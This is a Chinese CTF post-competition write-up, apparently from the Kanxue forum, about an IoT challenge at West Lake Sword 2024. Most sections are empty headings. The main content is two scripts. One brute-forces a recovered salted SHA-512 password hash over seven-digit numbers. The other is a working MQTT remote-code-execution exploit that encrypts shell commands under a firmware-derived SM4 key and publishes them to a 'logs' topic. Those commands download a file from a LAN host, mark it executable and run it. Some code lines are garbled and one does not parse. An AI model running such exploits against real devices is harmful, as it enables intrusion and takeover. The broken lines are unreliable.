一
前言
二
大致的题目以及分数分布
三
1~5题目分析
(1)分析复位按钮
(2)分析flash型号
(3)分析波特率
(4)8888端口服务分析
(5)xxx端口密码爆破
xhlj2024:$6$pvCQQygWXp04MJao$aYIMt03T2goWCa6JLX7QY6/p4C3lUzGZIUueePaHibbiihShFGufRHXzhCEeVGW4u7o39DCUEeTPASKH/0N6mQ==
import hashlib
import base64
# Target hash (the base64 string before decoding): the last `$`-separated
# field of the recovered credential line `xhlj2024:$6$pvCQQygWXp04MJao$...`.
target_hash_base64 = "aYIMt03T2goWCa6JLX7QY6/p4C3lUzGZIUueePaHibbiihShFGufRHXzhCEeVGW4u7o39DCUEeTPASKH/0N6mQ=="
# Decode the base64 target hash to raw bytes and keep the hex form so it can
# be compared directly with hashlib's hexdigest() output below.
# NOTE(review): the 88 base64 characters (with `==` padding) decode to 64
# bytes, the size of a SHA-512 digest; that, rather than the conventional
# meaning of a `$6$` prefix (sha512crypt), is what motivates the raw-SHA-512
# guess in this script — confirm against the firmware's own routine.
target_hash = base64.b64decode(target_hash_base64).hex()
print(target_hash)
# Salt: the middle `$`-separated field, also decoded as base64 (12 raw bytes).
salt = base64.b64decode("pvCQQygWXp04MJao")
# Hash function: one SHA-512 pass over the password followed by the salt.
def hash_password(password, salt):
    """Return the hex SHA-512 digest of ``password`` (UTF-8) followed by ``salt``.

    Args:
        password: candidate password as ``str``.
        salt: raw salt bytes appended after the encoded password.

    Returns:
        128-character lowercase hex string.
    """
    material = password.encode() + salt
    digest = hashlib.sha512(material)
    return digest.hexdigest()
# Sanity check: hash one zero-padded 7-digit candidate with the salt.
print(hash_password(str('0123456').rjust(7,'0'), salt))
# Try every 7-digit numeric password (10**7 candidates), zero-padded.
# Defender note: the scheme above is a single fast hash round with no work
# factor, so a numeric keyspace this small is exhausted in seconds; a
# password-hashing KDF (sha512crypt/bcrypt/argon2) plus a longer, non-numeric
# password policy is what makes this kind of loop impractical.
for password in range(0, 10000000):
    # NOTE(review): `rj ust` looks like `rjust` split during extraction; as
    # written this line does not parse — confirm against the original post.
    if hash_password(str(password).rj ust(7,'0'), salt) == target_hash:
        print(f"找到密码:{password}")
        break
else:
    # for/else: runs only when the loop completes without hitting `break`.
    print("没有找到匹配的密码。")
四
关于固件dump的研究
五
关于mqtt的rce的研究
{"log":1,"timestamp":"xxxx","info":"xxxx"}
aa-bb-cc:dd:ee
aa为标准月份格式
bb为标准天数格式
cc dd ee分别为标准时 分 秒格式
# The three-step sequence that the Python script below sends as cmd1..cmd3:
# fetch a file from a LAN host, mark it executable, run it.
wget http://192.168.1.219:9/z
chmod +x /z
# Defender note: an IoT device making an outbound HTTP fetch to a peer on a
# non-standard port and then executing a file dropped at the filesystem root
# is a high-signal sequence for egress filtering and process-start monitoring.
/z
import time
import struct
import base64
import paho.mqtt.client as mqtt
from gmssl.sm4 import CryptSM4, SM4_ENCRYPT, SM4_DECRYPT
def on_connect(client, userdata, flags, rc):
    """paho-mqtt (callback API v1) connect callback.

    Prints a success line when the broker's connect return code ``rc`` is 0;
    otherwise prints the failure text and the code. ``client``, ``userdata``
    and ``flags`` are accepted for the callback signature but not used.
    """
    if rc != 0:
        # NOTE(review): print() does not %-format, so the code is emitted as
        # a second argument; `%dn` also reads like a mangled `%d\n`.
        print("Failed to connect, return code %dn", rc)
        return
    print("Connected to MQTT Broker!")
def pack_key(v24):
    """Serialise the first four entries of ``v24`` as little-endian uint32.

    Args:
        v24: sequence of at least four integers in the uint32 range.

    Returns:
        16 bytes: ``v24[0]``..``v24[3]``, each packed with ``'<I'``.

    Raises:
        IndexError: if ``v24`` has fewer than four entries.
        struct.error: if an entry is outside the uint32 range.
    """
    words = (v24[i] for i in range(4))
    return b''.join(struct.pack('<I', w) for w in words)
def encode_sm4(value, key):
    """SM4-ECB encrypt ``value`` with ``key`` using gmssl's CryptSM4.

    :value: plaintext bytes
    :key: SM4 key bytes handed to ``set_key``
    :return: ciphertext bytes from ``crypt_ecb``

    Security note: ECB with a fixed key has no integrity protection and maps
    equal plaintext blocks to equal ciphertext blocks, so a receiver cannot
    tell a forged message from a genuine one.  NOTE(review): whether
    ``crypt_ecb`` pads its output is not visible here — the caller's length
    check suggests it does; confirm against the gmssl version in use.
    """
    cipher = CryptSM4()
    cipher.set_key(key, SM4_ENCRYPT)
    return cipher.crypt_ecb(value)
def decode_sm4(value, key):
    """SM4-ECB decrypt ``value`` with ``key`` using gmssl's CryptSM4.

    Inverse of ``encode_sm4``: same key schedule, ``SM4_DECRYPT`` direction.

    :value: ciphertext bytes
    :key: SM4 key bytes handed to ``set_key``
    :return: plaintext bytes from ``crypt_ecb``
    """
    cipher = CryptSM4()
    cipher.set_key(key, SM4_DECRYPT)
    return cipher.crypt_ecb(value)
def get_input(command):
    """Build the base64 ``info`` field value carrying ``command`` for one message.

    Steps: pack four hard-coded 32-bit words into a 16-byte SM4 key, frame
    ``command`` and right-pad it to 0x20 bytes, SM4-ECB encrypt, prepend a
    marker, then base64-encode.  Calls ``exit(0)`` if the ciphertext exceeds
    0x30 bytes or the base64 length is not a multiple of 4.

    Args:
        command: command as bytes.

    Returns:
        base64-encoded payload as bytes.

    Security notes (device side): the key is a fixed constant, so anyone
    holding the firmware image can produce valid ciphertext, and ECB with no
    MAC gives the receiver no way to reject a forged message.  Authenticated
    encryption under per-device keys — and not executing text taken from a
    "log" message at all — are the fixes.
    """
    # Four 32-bit words of the SM4 key. NOTE(review): the name `v24` reads like
    # a decompiler local, so these presumably come from the firmware binary —
    # not shown on this page.
    v24 = [0x9845DC01, 0x10CD5489, 0x67BA23FE, 0xEF32AB76]
    key_bytes = pack_key(v24)
    ## --generate input--
    test_key = key_bytes
    # Frame the command. NOTE(review): `b'"n'`, `b'n'` and `b"xbf"` below look
    # like escape sequences whose backslashes were lost in extraction; they
    # are reproduced exactly as found.
    cmd = b'"n'
    cmd += command
    cmd += b'n'
    # Right-pad the framed command with 'a' to a fixed 0x20-byte plaintext
    # (ljust never truncates, so a longer command stays longer).
    cmd = cmd.ljust(0x20,b"a")
    #print(test_key)
    #print(b"cmd:"+cmd)
    #print("len_cmd:"+str(len(cmd)))
    sm4_encode = encode_sm4(cmd,test_key)
    #print(b"sm4_encode:"+sm4_encode)
    #print("len_sm4_encode:"+str(len(sm4_encode)))
    # Size guard on the ciphertext. NOTE(review): `exit(0)` reports success to
    # the shell on an error path; a non-zero status would be the convention.
    if len(sm4_encode) > 0x30 :
        print("len_sm4_encode:"+str(len(sm4_encode)))
        print("[+]erro:encode_sm4_string is too long!")
        exit(0)
    #print(sm4_encode[:32])
    #print(decode_sm4(sm4_encode,test_key))
    # Prefix marker (see note above) ahead of the ciphertext, then base64 so
    # the result can sit inside a JSON string field.
    after_base64_decode = b"xbf"+sm4_encode
    mos_input = base64.b64encode(after_base64_decode)
    #print(b"input:"+mos_input)
    #print("len_input:"+str(len(mos_input)))
    # base64.b64encode always yields a length divisible by 4, so this is a
    # belt-and-braces check on the format the device expects.
    if (len(mos_input) & 3) :
        print("len_input:"+str(len(mos_input)))
        print("[+]erro:input len & 3 != 0")
        exit(0)
    return mos_input
if __name__ == "__main__":
    # The three shell steps from the section above, sent as separate messages.
    cmd1 = b'wget http://192.168.1.219:9/z'
    cmd2 = b'chmod +x /z'
    cmd3 = b'/z'
    #cmd1 = b'mkdir /tmp/nameless'
    # get_input returns bytes; decode to str for JSON string building.
    input1 = get_input(cmd1).decode()
    input2 = get_input(cmd2).decode()
    input3 = get_input(cmd3).decode()
    print("[+]input1:"+input1)
    print("[+]input2:"+input2)
    print("[+]input3:"+input3)
    # Wrap each payload in the log-message JSON shape shown earlier
    # ({"log":1,"timestamp":"MM-DD-hh:mm:ss","info":...}); only `info` varies.
    # Detection note: a `logs` message whose `info` field is base64 rather
    # than readable log text is the observable artefact of this technique.
    p1 = '{"log":1,"timestamp":"11-11-11:11:11","info":'+'"'+input1+'"}'
    p2 = '{"log":1,"timestamp":"11-11-11:11:11","info":'+'"'+input2+'"}'
    p3 = '{"log":1,"timestamp":"11-11-11:11:11","info":'+'"'+input3+'"}'
    print(p1)
    print(p2)
    print(p3)
    ## --try rce by mqtt--
    # Defender notes: the broker is reached with hard-coded credentials and no
    # tls_set() call, i.e. plaintext MQTT on 8888, and any client that can
    # authenticate may publish to `logs`, which the device evidently acts on.
    # Broker ACLs restricting who may publish to that topic are the control
    # point; per-device credentials and TLS limit reuse of captured ones.
    client = mqtt.Client(mqtt.CallbackAPIVersion.VERSION1)
    client.username_pw_set(username="xhlj2024", password="2758934")
    client.on_connect = on_connect
    # NOTE(review): no network loop (loop_start/loop_forever) is run, so the
    # CONNACK is never processed and on_connect is not dispatched by this
    # script as written — verify against the paho version in use.
    client.connect("192.168.1.1", 8888)
    topic = "logs"
    # Two-second gaps between messages, presumably so each command completes
    # before the next arrives — the device's handling is not shown here.
    client.publish(topic, p1)
    time.sleep(2)
    client.publish(topic,p2)
    time.sleep(2)
    client.publish(topic,p3)
    time.sleep(2)
    client.disconnect()
六
RCE后的赛题分析
(7)5679端口号服务
七
总结
看雪ID:Nameless_a
https://bbs.kanxue.com/user-home-943085.htm
原文始发于微信公众号(看雪学苑):西湖论剑2024 IOT赛后复盘及mqtt rce详解